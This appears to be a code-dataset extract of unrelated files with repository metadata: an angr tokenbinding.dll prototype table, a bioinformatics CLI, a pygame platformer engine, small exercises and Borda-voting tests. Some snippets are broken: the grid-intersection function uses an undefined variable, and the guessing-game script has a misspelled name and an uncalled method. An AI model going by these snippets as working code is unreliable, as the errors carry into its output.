# pylint:disable=line-too-long import logging from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64 from .. import SIM_PROCEDURES as P from . import SimLibrary _l = logging.getLogger(name=__name__) lib = SimLibrary() lib.set_default_cc('X86', SimCCStdcall) lib.set_default_cc('AMD64', SimCCMicrosoftAMD64) lib.set_library_names("tokenbinding.dll") prototypes = \ { # 'TokenBindingGenerateBinding': SimTypeFunction([SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="TOKENBINDING_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="TOKENBINDING_EXTENSION_FORMAT"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimStruct({"bindingType": SimTypeInt(signed=False, label="TOKENBINDING_TYPE"), "identifierSize": SimTypeInt(signed=False, label="UInt32"), "identifierData": SimTypePointer(SimStruct({"keyType": SimTypeChar(label="Byte")}, name="TOKENBINDING_IDENTIFIER", pack=False, align=None), offset=0), "extensionFormat": SimTypeInt(signed=False, label="TOKENBINDING_EXTENSION_FORMAT"), "extensionSize": SimTypeInt(signed=False, label="UInt32"), "extensionData": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="TOKENBINDING_RESULT_DATA", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["keyType", "targetURL", "bindingType", "tlsEKM", "tlsEKMSize", "extensionFormat", "extensionData", "tokenBinding", "tokenBindingSize", "resultData"]), # 'TokenBindingGenerateMessage': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["tokenBindings", "tokenBindingsSize", "tokenBindingsCount", "tokenBindingMessage", "tokenBindingMessageSize"]), # 'TokenBindingVerifyMessage': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"resultCount": SimTypeInt(signed=False, label="UInt32"), "resultData": SimTypePointer(SimStruct({"bindingType": SimTypeInt(signed=False, label="TOKENBINDING_TYPE"), "identifierSize": SimTypeInt(signed=False, label="UInt32"), "identifierData": SimTypePointer(SimStruct({"keyType": SimTypeChar(label="Byte")}, name="TOKENBINDING_IDENTIFIER", pack=False, align=None), offset=0), "extensionFormat": SimTypeInt(signed=False, label="TOKENBINDING_EXTENSION_FORMAT"), "extensionSize": SimTypeInt(signed=False, label="UInt32"), "extensionData": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="TOKENBINDING_RESULT_DATA", pack=False, align=None), offset=0)}, name="TOKENBINDING_RESULT_LIST", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["tokenBindingMessage", "tokenBindingMessageSize", "keyType", "tlsEKM", "tlsEKMSize", "resultList"]), # 'TokenBindingGetKeyTypesClient': SimTypeFunction([SimTypePointer(SimTypePointer(SimStruct({"keyCount": SimTypeInt(signed=False, label="UInt32"), "keyType": SimTypePointer(SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), offset=0)}, name="TOKENBINDING_KEY_TYPES", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["keyTypes"]), # 'TokenBindingGetKeyTypesServer': SimTypeFunction([SimTypePointer(SimTypePointer(SimStruct({"keyCount": SimTypeInt(signed=False, label="UInt32"), "keyType": SimTypePointer(SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), offset=0)}, name="TOKENBINDING_KEY_TYPES", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["keyTypes"]), # 'TokenBindingDeleteBinding': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["targetURL"]), # 'TokenBindingDeleteAllBindings': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")), # 'TokenBindingGenerateID': SimTypeFunction([SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"bindingType": SimTypeInt(signed=False, label="TOKENBINDING_TYPE"), "identifierSize": SimTypeInt(signed=False, label="UInt32"), "identifierData": SimTypePointer(SimStruct({"keyType": SimTypeChar(label="Byte")}, name="TOKENBINDING_IDENTIFIER", pack=False, align=None), offset=0), "extensionFormat": SimTypeInt(signed=False, label="TOKENBINDING_EXTENSION_FORMAT"), "extensionSize": SimTypeInt(signed=False, label="UInt32"), "extensionData": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="TOKENBINDING_RESULT_DATA", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["keyType", "publicKey", "publicKeySize", "resultData"]), # 'TokenBindingGenerateIDForUri': SimTypeFunction([SimTypeInt(signed=False, label="TOKENBINDING_KEY_PARAMETERS_TYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypePointer(SimStruct({"bindingType": SimTypeInt(signed=False, label="TOKENBINDING_TYPE"), "identifierSize": SimTypeInt(signed=False, label="UInt32"), "identifierData": SimTypePointer(SimStruct({"keyType": SimTypeChar(label="Byte")}, name="TOKENBINDING_IDENTIFIER", pack=False, align=None), offset=0), "extensionFormat": SimTypeInt(signed=False, label="TOKENBINDING_EXTENSION_FORMAT"), "extensionSize": SimTypeInt(signed=False, label="UInt32"), "extensionData": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="TOKENBINDING_RESULT_DATA", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["keyType", "targetUri", "resultData"]), # 'TokenBindingGetHighestSupportedVersion': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["majorVersion", "minorVersion"]), } lib.set_prototypes(prototypes)
[ "noreply@github.com" ]
mborgerson.noreply@github.com
68cf799fe4f6d54a02fd5013dd8b5100c7eac001
9896742e3554ca924a05e1fbb571f00a5a103c8a
/hellp.py
de608408b926eed4807613b5ecbc4fbbe108b2b0
[]
no_license
imarkofu/gitskills
4d027141c816d33ebb4c8bd6698ade2ff9d60cb0
de5beea54e30d3470bd9930311bece917cd9435f
refs/heads/master
2021-01-20T16:24:25.137708
2017-02-23T02:43:45
2017-02-23T02:43:45
82,778,000
0
0
null
null
null
null
UTF-8
Python
false
false
36
py
dddd add coding: utf-8 dddfasdfasdf
[ "gbwl_cgl@163.com" ]
gbwl_cgl@163.com
832351d1f81817222ee3098cd7399d13748b0bff
67e51d2e6d6936ec64ad4ba6cd1f6a8ce3dd6a30
/fastx_barber/scripts/barber.py
97e5aa0f48c27518169c0e19e16b4c50d5e95613
[ "MIT" ]
permissive
ggirelli/fastx-barber
b433f501ae606b44cd6942753e714a28a5828913
76d888d11f06690b74fc8d4b857d447ac4b4ea45
refs/heads/main
2023-04-08T07:25:15.098820
2022-08-23T08:28:05
2022-08-23T08:28:05
281,703,558
4
0
MIT
2023-03-07T08:24:30
2020-07-22T14:42:55
Python
UTF-8
Python
false
false
1,126
py
""" @author: Gabriele Girelli @contact: gigi.ga90@gmail.com """ import argparse from fastx_barber import __version__ from fastx_barber.scripts import arguments as ap from fastx_barber import scripts import sys def default_parser(*args) -> None: print("fbarber -h for usage details.") sys.exit() def main(): parser = argparse.ArgumentParser( description=f""" Version: {__version__} Author: Gabriele Girelli Docs: http://ggirelli.github.io/fastx-barber Code: http://github.com/ggirelli/fastx-barber FASTX barber tools. """, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.set_defaults(parse=default_parser) parser = ap.add_version_option(parser) subparsers = parser.add_subparsers( title="sub-commands", help="Access the help page for a sub-command with: sub-command -h", ) scripts.find_seq.init_parser(subparsers) scripts.flag.init_parser(subparsers) scripts.match.init_parser(subparsers) scripts.trim.init_parser(subparsers) args = parser.parse_args() args = args.parse(args) args.run(args)
[ "noreply@github.com" ]
ggirelli.noreply@github.com
d8d75f9cd736c02ebfc0300cba70b6931cb27601
c8a0505175fdddda7481fc7c3f7ff58f85702b91
/others/area_of_trapezoid.py
db8502fffa6a350b73dd42047516b778febaf206
[]
no_license
fortune2009/python-exercises
9f8f649576f8d012e3f2358d3a54f51d1e204dc9
c10da8b6d0e8f056ef6e801a0e8f9b9e2f79071a
refs/heads/master
2022-05-27T09:13:55.416541
2020-05-03T15:06:29
2020-05-03T15:06:29
257,142,200
0
0
null
null
null
null
UTF-8
Python
false
false
239
py
#X and Y meters for a trapezoid #refactor code later to collect input from user #make use of a sentinel control x_meters = 5 y_meters = 7 height = 8 area = 0.5 * (x_meters + y_meters) * height print('The area of a trapezoid is: ',area)
[ "fortunekbz2009@gmail.com" ]
fortunekbz2009@gmail.com
0da0ebf65f5d51c72ebfcc51a45a75e658be8978
0733f47cd0a25b622b1a60fb9243f70fad040540
/Platformer/scripts/scenes/TestEngine.py
5df7cd6d1c18d0efd4c08a5b04a9683d4f2f13d9
[]
no_license
KingdomPy/Pygame-Demos
ef4f96d8d56156823961ba6f7c246eb8f257c77e
aa5dfde6e3a36c6ec3a03738c723dd65eec0cfff
refs/heads/main
2022-12-30T03:18:40.404546
2020-10-06T16:13:34
2020-10-06T16:13:34
301,782,068
1
0
null
null
null
null
UTF-8
Python
false
false
16,449
py
import pygame import math import json from tkinter import Tk from tkinter import filedialog from scripts import filePath from scripts.entities import EntityController, TileController asset_path = filePath.setPath(filePath.getRootFolder(2), ["assets"]) assets_tiles = [ pygame.image.load(filePath.setPath(asset_path, ["maps", "grass.png"])).convert_alpha(), pygame.image.load(filePath.setPath(asset_path, ["maps", "rock.png"])).convert_alpha(), pygame.image.load(filePath.setPath(asset_path, ["maps", "background.png"])).convert_alpha(), pygame.image.load(filePath.setPath(asset_path, ["maps", "spawn.png"])).convert_alpha(), pygame.image.load(filePath.setPath(asset_path, ["maps", "goal.png"])).convert_alpha(), ] assets_hud = [ pygame.image.load(filePath.setPath(asset_path, ["map maker", "import.png"])).convert(), pygame.image.load(filePath.setPath(asset_path, ["map maker", "export.png"])).convert(), ] assets_fonts = [ filePath.setPath(asset_path, ["fonts", "Coda-Regular.ttf"]), ] def collide_rect(rect1, rect2): x1, y1, w1, l1 = rect1 x2, y2, w2, l2 = rect2 x_collision = (x1 <= x2 <= x1+w1) or (x1 <= x2+w2 <= x1+w1) or (x2 <= x1 <= x2+w2) or (x2 <= x1+w1<= x2+w2) y_collision = (y1 <= y2 <= y1+l1) or (y1 <= y2+l2 <= y1+l1) or (y2 <= y1 <= y2+l2) or (y2 <= y1+l1 <= y2+l2) if x_collision and y_collision: return True return False class Scene: def __init__(self, resolution, fps, debug, data=None): self.resolution = resolution self.debug = debug self.resolution_scale = resolution[0] / 3200 self.player = EntityController.Entity() self.player.scale_entity(self.resolution_scale) self.assistant = EntityController.Entity() self.assistant.scale_entity(self.resolution_scale) self.main_camera = Camera(resolution, debug) self.main_camera.following = self.player split_resolution = (resolution[0] / 2, resolution[1] / 2) self.split_camera_1 = Camera(split_resolution, debug) self.split_camera_1.change_zoom(self.split_camera_1.camera_zoom * 0.5) self.split_camera_1.following = self.player self.split_camera_2 = Camera(split_resolution, debug) self.split_camera_2.change_zoom(self.split_camera_2.camera_zoom * 0.5) self.split_camera_2.following = self.assistant self.half_surface_1 = pygame.Surface(split_resolution) self.half_surface_2 = pygame.Surface(split_resolution) self.display_mode = 0 # 0, 1 = single, split screen self.entities = [self.player, self.assistant] self.tile_size = 100 # width, length = 100 self.chunk_size = 1000 # width, length = 1200 self.tile_map = [] self.spawn = (0, 0) self.goal = (0, 0) self.chunks = [[(0, 0)]] while self.chunks == [[(0, 0)]]: self.import_tile_map() self.player.x = self.spawn[0] self.player.y = self.spawn[1] + self.player.length * 2 self.assistant.x = self.spawn[0] self.assistant.y = self.spawn[1] + self.assistant.length * 2 self.main_camera.tile_map = self.tile_map self.split_camera_1.tile_map = self.tile_map self.split_camera_2.tile_map = self.tile_map self.main_font = pygame.font.Font(assets_fonts[0], int(16 + 8 * self.resolution_scale)) self.background = pygame.image.load("assets/maps/test.png").convert() def resize_assets(self): self.main_font = pygame.font.Font(assets_fonts[0], int(16 + 8 * self.resolution_scale)) def import_tile_map(self): root = Tk() root.withdraw() path = filedialog.askopenfilename(filetypes=(("Text Files", ".json .txt"), )) if path != "": with open(path, 'r', encoding='utf-8-sig') as file: data = json.loads(file.read()) tile_map = data["tile_map"] scale = self.resolution[0] / 3200 for x, y, sprite_code in tile_map: x -= self.tile_size * scale tile = TileController.Tile(self.tile_size, self.tile_size, sprite_code) tile.x, tile.y = x, y if sprite_code == 2: tile.collidable = False elif sprite_code == 3: tile.collidable = False tile.visible = False self.spawn = (x, y) elif sprite_code == 4: self.goal = (x, y) chunk_x = x // self.chunk_size chunk_y = y // self.chunk_size for chunk in self.chunks: found = False if chunk[0] == (chunk_x, chunk_y): chunk.append(tile) found = True break if not found: self.chunks.append([(chunk_x, chunk_y), tile]) for chunk in self.chunks: chunk[0] = (chunk[0][0] * self.chunk_size, chunk[0][1] * self.chunk_size) root.destroy() def update(self, surface, events, dt, current_fps): dt /= 1000 if self.display_mode == 0: surface.fill((255, 255, 255)) elif self.display_mode == 1: self.half_surface_1.fill((255, 255, 255)) self.half_surface_2.fill((255, 255, 255)) surface.blit(self.background, (0, 0)) keys = pygame.key.get_pressed() if keys[pygame.K_w]: self.player.w_pressed = True if keys[pygame.K_a]: self.player.a_pressed = True if keys[pygame.K_d]: self.player.d_pressed = True if keys[pygame.K_UP]: self.assistant.w_pressed = True if keys[pygame.K_LEFT]: self.assistant.a_pressed = True if keys[pygame.K_RIGHT]: self.assistant.d_pressed = True for event in events: if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: return "switch", "map creator", [] if event.key == pygame.K_SPACE: self.display_mode += 1 self.display_mode %= 2 camera_chunk_data = [] camera_entity_data = [] split_camera_1_entity_data = [] split_camera_1_chunk_data = [] split_camera_2_entity_data = [] split_camera_2_chunk_data = [] for entity in self.entities: entity.update(dt) my_rect = entity.get_rect() for chunk in self.chunks: chunk_x, chunk_y = chunk[0] chunk_rect = (chunk_x, chunk_y, self.chunk_size, self.chunk_size) if collide_rect(my_rect, chunk_rect): for i in range(1, len(chunk)): tile = chunk[i] if tile.collidable: distance = math.sqrt((entity.x - tile.x) ** 2 + (entity.y - tile.y) ** 2) - entity.width - tile.width if tile.angle == 0 and entity.angle == 0 and distance <= 0: tile_rect = tile.get_rect() if collide_rect(my_rect, tile_rect): if tile.sprite_code == 4: entity.x = self.spawn[0] entity.y = self.spawn[1] + entity.length * 2 else: x_overlap = min(abs((tile.x + tile.width / 2) - (entity.x - entity.width / 2)), abs((entity.x + entity.width / 2) - (tile.x - tile.width / 2))) y_overlap = min(abs((tile.y + tile.length / 2) - (entity.y - entity.length / 2)), abs((entity.y + entity.length / 2) - (tile.y - tile.length / 2))) if abs(x_overlap) < abs(y_overlap): # Shift the x if entity.x < tile.x: entity.touching_right_wall = True entity.x -= x_overlap else: entity.touching_left_wall = True entity.x += x_overlap else: # Shift the y if entity.y < tile.y: entity.touching_ceiling = True entity.fall_velocity = 0 entity.y -= y_overlap else: entity.touching_ground = True entity.y += y_overlap my_rect = entity.get_rect() position, radius = entity.get_position(), entity.width / 2 if self.display_mode == 0: if self.main_camera.in_camera(position, radius): camera_entity_data.append(entity.get_polygon()) elif self.display_mode == 1: if self.split_camera_1.in_camera(position, radius): split_camera_1_entity_data.append(entity.get_polygon()) if self.split_camera_2.in_camera(position, radius): split_camera_2_entity_data.append(entity.get_polygon()) if self.display_mode == 0: for chunk in self.chunks: x, y = chunk[0][0] + self.chunk_size / 2, chunk[0][1] + self.chunk_size / 2 if self.main_camera.in_camera((x, y), self.chunk_size / 2): camera_chunk_data.append(chunk) self.main_camera.update(dt) self.main_camera.update_screen(surface, camera_chunk_data, camera_entity_data) text = self.main_font.render("FPS:" + str(current_fps), True, (0, 0, 0)) surface.blit(text, (10, 10)) elif self.display_mode == 1: for chunk in self.chunks: x, y = chunk[0][0] + self.chunk_size / 2, chunk[0][1] + self.chunk_size / 2 if self.split_camera_1.in_camera((x, y), self.chunk_size / 2): split_camera_1_chunk_data.append(chunk) if self.split_camera_2.in_camera((x, y), self.chunk_size / 2): split_camera_2_chunk_data.append(chunk) self.split_camera_1.update(dt) self.split_camera_1.update_screen(self.half_surface_1, split_camera_1_chunk_data, split_camera_1_entity_data) surface.blit(self.half_surface_1, (self.resolution[0] / 4, 0)) self.split_camera_2.update(dt) self.split_camera_2.update_screen(self.half_surface_2, split_camera_2_chunk_data, split_camera_2_entity_data) surface.blit(self.half_surface_2, (self.resolution[0] / 4, self.resolution[1] / 2)) text = self.main_font.render("FPS:"+str(current_fps), True, (0, 0, 0)) surface.blit(text, (self.resolution[0] / 4 + 10, 10)) return 0 class Camera: def __init__(self, resolution, debug): self.resolution = resolution self.resolution_scale = resolution[0] / 3200 self.center_x = resolution[0] / 2 self.center_y = resolution[1] / 2 self.debug = debug self.camera_speed = 270 self.camera_zoom = 1 * resolution[0] / 3200 self.max_zoom = 8 * resolution[0] / 3200 self.min_zoom = 0.1 * resolution[0] / 3200 self.following = None self.x, self.y, self.angle = 0, 0, 0 self.tile_map_name = "Untitled" self.tile_map = [] self.tiles = [] self.display_tiles = [] self.display_assets = [] self.tile_size = 100 self.display_size = self.tile_size * 2/3 self.main_font = pygame.font.Font(assets_fonts[0], int(16 + 8 * self.resolution_scale)) self.resize_assets() def resize_assets(self): self.main_font = pygame.font.Font(assets_fonts[0], int(16 + 8 * self.resolution_scale)) scale = round(self.display_size) self.display_tiles = [] for tile in assets_tiles: tile = pygame.transform.smoothscale(tile, (scale, scale)) self.display_tiles.append(tile) for asset in assets_hud: asset = pygame.transform.smoothscale(asset, (scale, scale)) self.display_assets.append(asset) self.resize_tiles() def resize_tiles(self): scale = round(self.tile_size * self.camera_zoom) self.tiles = [] for tile in assets_tiles: tile = pygame.transform.smoothscale(tile, (scale, scale)) self.tiles.append(tile) def move_forward(self, dt): self.x += math.cos(self.angle) * self.camera_speed * dt self.y += math.sin(self.angle) * self.camera_speed * dt def move_fixed(self, distance): self.x += math.cos(self.angle) * distance self.y += math.sin(self.angle) * distance def point_in_direction(self, x_dif, y_dif): if y_dif < 0: self.angle = - math.pi / 2 - math.atan(x_dif / y_dif) else: if y_dif != 0: self.angle = math.pi / 2 - math.atan(x_dif / y_dif) elif y_dif == 0: if x_dif < 0: self.angle = -math.pi else: self.angle = math.pi def point_to(self, x, y): self.point_in_direction(x - self.x, y - self.y) def in_camera(self, position, radius): x_dif = abs(self.x - position[0]) y_dif = abs(self.y - position[1]) if x_dif - radius < self.center_x / self.camera_zoom and y_dif - radius < self.center_y / self.camera_zoom: return 1 return 0 def change_zoom(self, zoom): self.camera_zoom += zoom if self.camera_zoom > self.max_zoom: self.camera_zoom = self.max_zoom elif self.camera_zoom < self.min_zoom: self.camera_zoom = self.min_zoom self.resize_tiles() def update(self, dt): if self.following is not None: target_x, target_y = self.following.get_position() self.point_to(target_x, target_y) distance = math.sqrt((self.x - target_x) ** 2 + (self.y - target_y) ** 2) step = distance / 64 * dt if distance - step > 0: self.move_forward(step) else: self.move_fixed(distance) def update_screen(self, surface, chunk_data, entity_data): chunk_count = 0 tile_count = 0 for chunk in chunk_data: chunk_count += 1 for i in range(1, len(chunk)): tile = chunk[i] if tile.visible: if self.in_camera(tile.get_position(), tile.width / 2): tile_count += 1 image = self.tiles[tile.sprite_code] width = tile.width * self.camera_zoom length = tile.length * self.camera_zoom screen_x = self.center_x - (self.x - tile.x) * self.camera_zoom screen_y = self.center_y + (self.y - tile.y) * self.camera_zoom surface.blit(image, (screen_x - width / 2, screen_y - length / 2)) if self.debug: pygame.draw.rect(surface, (0, 0, 0), (screen_x - width / 2, screen_y - length / 2, width, length), 5) for polygon in entity_data: points = [] for x, y in polygon: screen_x = self.center_x - (self.x - x) * self.camera_zoom screen_y = self.center_y + (self.y - y) * self.camera_zoom points.append((screen_x, screen_y)) pygame.draw.polygon(surface, (0, 0, 0), points) text = self.main_font.render("CHUNKS:" + str(chunk_count), True, (0, 0, 0)) surface.blit(text, (10, 40)) text = self.main_font.render("TILES:" + str(tile_count), True, (0, 0, 0)) surface.blit(text, (10, 70))
[ "donmonkey44@gmail.com" ]
donmonkey44@gmail.com
57edfbafd25590c3a9938f84c2cc09b872853e20
276b5e5e810c5d48f6b8196accbcf2f3a3a81605
/IronPythonExample/PythonScripts/GuessingGame.py
2f47a868ab193e65894ac9e31f073b32fcbf345b
[ "MIT" ]
permissive
balee323/IronPythonExample
badf6106f19dcdb25f90ffdb7df1b10c7397ea44
4418d72ec143b2ff65f3acc56111ba647b228fe8
refs/heads/master
2022-11-23T15:06:41.588119
2020-07-29T22:04:24
2020-07-29T22:04:24
283,610,694
0
0
null
null
null
null
UTF-8
Python
false
false
919
py
import time import datetime class GuessingGame(object): def __init__(self): self.guesses = 0 self.number = 0 def start_game(self): try: return "Guess a number between 1 and 10" except Exception as ex: print("error") def make_guess(self, value): self.guesses = self.guesses + 1 if value == self.number: print("From Script: winner") return "winner" else: print("From Script: guess again") return "guess again" def clear_list(self): self.guesses = 0 def set_number_to_guess(self, value): self.number = value #start server if not imported as module if __name__ == '__main__': print("game is running as a program") game = GuessingGame() response = game.start_game print(respone) else: print("game imported as a module")
[ "blee@babelstreet.com" ]
blee@babelstreet.com
723dc5b80d22081ac0a0e803d5a8e888cb76333f
b186830ab8e74452cb2e8ff0188d0a8fa3d15b59
/areaOfIntersection.py
626a809e2f9cf6aa7a017300e014806bf952f37b
[]
no_license
cafaray/atco.de-fights
e3a278bd51feb7bee05623eaf20d1ea4db535eb6
1304bcabf1f18202c14a20b38144854ef05bf776
refs/heads/master
2022-11-26T05:57:37.564504
2020-07-28T12:07:01
2020-07-28T12:07:01
124,416,047
0
0
null
null
null
null
UTF-8
Python
false
false
785
py
def areaOfIntersection(shape1, shape2): cells = 0 for x in range(shape1[1]-shape1[0], shape[1]+shape[0]): for y in range(shape1[2] - shape1[0], shape[2]+shape[0]): diff1 = abs(x - shape1[1]) + abs(y - shape1[2]) diff2 = abs(x - shape2[1]) + abs(y - shape2[2]) if diff1 < shape1[0] and diff2 < shape2[0]: cells+=1 return cells #areaOfIntersection([r1, x1, y1], [r2, x2, y2]) { #let cells = 0; #for(let x = x1 - r1; x <= x1 + r1; x++) { # for(let y = y1 - r1; y <= y1 + r1; y++) { # const diff1 = Math.abs(x - x1) + Math.abs(y - y1); # const diff2 = Math.abs(x - x2) + Math.abs(y - y2); # if(diff1 < r1 && diff2 < r2) cells++; # } #} #return cells;
[ "omash@MacBook-Pro-de-Carlos.local" ]
omash@MacBook-Pro-de-Carlos.local
ede03f7baa18ff979304f1b42fe3050e1cc57721
a38d76039efec7b7553ee8a7ab27cf156f687a2c
/venv/bin/pyhtmlizer
fcaa171c6553807569055c37205b3de8d71e2a2f
[]
no_license
LottoDog/paBug_day05
0cdd294c01b79f12d055fbc1de6e3c5d1e885d3e
3742e49943aea554d3749ea0b06a6ea7466dfbb4
refs/heads/master
2020-05-30T20:57:12.808103
2019-06-03T08:01:24
2019-06-03T08:01:24
189,961,136
1
0
null
null
null
null
UTF-8
Python
false
false
426
#!/home/db/桌面/weichao/paBug_day05/venv/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'Twisted==19.2.0','console_scripts','pyhtmlizer' __requires__ = 'Twisted==19.2.0' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('Twisted==19.2.0', 'console_scripts', 'pyhtmlizer')() )
[ "1461217709@qq.com" ]
1461217709@qq.com
5eda38602c9897aa34ee18f8b6a594549d4df83c
4719f3ef5a0d40c4426a4ac8c9307fc4631b8eea
/tests/test_borda.py
36de3d7b168b9e3a7a42fd7fafbb598650240d4c
[ "MIT" ]
permissive
ozcan-durak/elsim
08104b9c8820e412d93e9cc91b5e0179151cbec5
3e0e53adc1579ba1ab9c429d05d772dad2c6eb5b
refs/heads/master
2022-12-05T13:23:23.200159
2020-08-18T01:09:52
2020-08-18T04:25:37
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,681
py
import random import numpy as np import pytest from hypothesis import given from hypothesis.strategies import integers, lists, permutations from elsim.methods import borda def collect_random_results(method, election): """ Run multiple elections with tiebreaker='random' and collect the set of all winners. """ random.seed(47) # Deterministic test winners = set() for trial in range(10): winner = method(election, tiebreaker='random') assert isinstance(winner, int) winners.add(winner) return winners @pytest.mark.parametrize("tiebreaker", [None, 'random', 'order']) def test_basic(tiebreaker): # Standard Tennessee example # https://en.wikipedia.org/wiki/Template:Tenn_voting_example Memphis, Nashville, Chattanooga, Knoxville = 0, 1, 2, 3 election = [*42*[[Memphis, Nashville, Chattanooga, Knoxville]], *26*[[Nashville, Chattanooga, Knoxville, Memphis]], *15*[[Chattanooga, Knoxville, Nashville, Memphis]], *17*[[Knoxville, Chattanooga, Nashville, Memphis]], ] assert borda(election, tiebreaker) == Nashville # Example from Ques 9 # http://www.yorku.ca/bucovets/4380/exercises/exercises_1_a.pdf v, w, x, y, z = 0, 1, 2, 3, 4 election = [*11*[[v, w, x, y, z]], *12*[[w, x, y, z, v]], *13*[[x, v, w, y, z]], *14*[[y, w, v, z, x]], *15*[[z, v, x, w, y]], ] assert borda(election, tiebreaker) == w # Manually calculated correct answer election = [[0, 1, 4, 3, 2], [4, 2, 3, 1, 0], [4, 2, 3, 1, 0], [3, 2, 1, 4, 0], [2, 0, 3, 1, 4], [3, 2, 1, 4, 0], ] assert borda(election, tiebreaker) == 2 # Example from # https://www3.nd.edu/~apilking/math10170/information/Lectures/Lecture-2.Borda%20Method.pdf K, H, R = 0, 1, 2 election = [*2*[[K, H, R]], *3*[[H, R, K]], *2*[[H, K, R]], *3*[[R, H, K]], ] assert borda(election, tiebreaker) == H # Example from # http://jlmartin.faculty.ku.edu/~jlmartin/courses/math105-F11/Lectures/chapter1-part2.pdf A, B, C, D = 0, 1, 2, 3 election = [*14*[[A, B, C, D]], *10*[[C, B, D, A]], * 8*[[D, C, B, A]], * 4*[[B, D, C, A]], * 1*[[C, D, B, A]], ] assert borda(election, tiebreaker) == B election = [*60*[[A, B, C, D]], *40*[[B, D, C, A]], ] assert borda(election, tiebreaker) == B # Table 3.1 from Mackie - Democracy Defended A, B, C, D, E = 0, 1, 2, 3, 4 election = [*4*[[A, E, D, C, B]], *3*[[B, C, E, D, A]], *2*[[C, D, E, B, A]], ] assert borda(election, tiebreaker) == E # "to E the Borda winner" # Example from # https://medium.com/@t2ee6ydscv/how-ranked-choice-voting-elects-extremists-fa101b7ffb8e r, b, g, o, y = 0, 1, 2, 3, 4 election = [*31*[[r, b, g, o, y]], * 5*[[b, r, g, o, y]], * 8*[[b, g, r, o, y]], * 1*[[b, g, o, r, y]], * 6*[[g, b, o, r, y]], * 1*[[g, b, o, y, r]], * 6*[[g, o, b, y, r]], * 2*[[o, g, b, y, r]], * 5*[[o, g, y, b, r]], * 7*[[o, y, g, b, r]], *28*[[y, o, g, b, r]], ] assert borda(election) == g def test_ties(): # Two-way tie between candidates 1 and 2 election = np.array([[0, 1, 2], [0, 2, 1], [1, 2, 0], [1, 2, 0], [1, 2, 0], [2, 1, 0], [2, 1, 0], [2, 1, 0], ]) # No tiebreaker: assert borda(election, tiebreaker=None) is None # Mode 'order' should always prefer lowest candidate ID assert borda(election, tiebreaker='order') == 1 # Mode 'random' should choose all tied candidates at random assert collect_random_results(borda, election) == {1, 2} # Three-way tie between 0, 1, and 2 election = np.array([[0, 1, 2], [0, 1, 2], [0, 1, 2], [1, 2, 0], [1, 2, 0], [1, 2, 0], [2, 0, 1], [2, 0, 1], [2, 0, 1], ]) # No tiebreaker: assert borda(election, tiebreaker=None) is None # Mode 'order' should always prefer lowest candidate ID assert borda(election, tiebreaker='order') == 0 # Mode 'random' should choose all tied candidates at random assert collect_random_results(borda, election) == {0, 1, 2} def complete_ranked_ballots(min_cands=3, max_cands=25, min_voters=1, max_voters=100): n_cands = integers(min_value=min_cands, max_value=max_cands) return n_cands.flatmap(lambda n: lists(permutations(range(n)), min_size=min_voters, max_size=max_voters)) @pytest.mark.parametrize("tiebreaker", ['random', 'order']) @given(election=complete_ranked_ballots(min_cands=1, max_cands=25, min_voters=1, max_voters=100)) def test_legit_winner(election, tiebreaker): election = np.asarray(election) 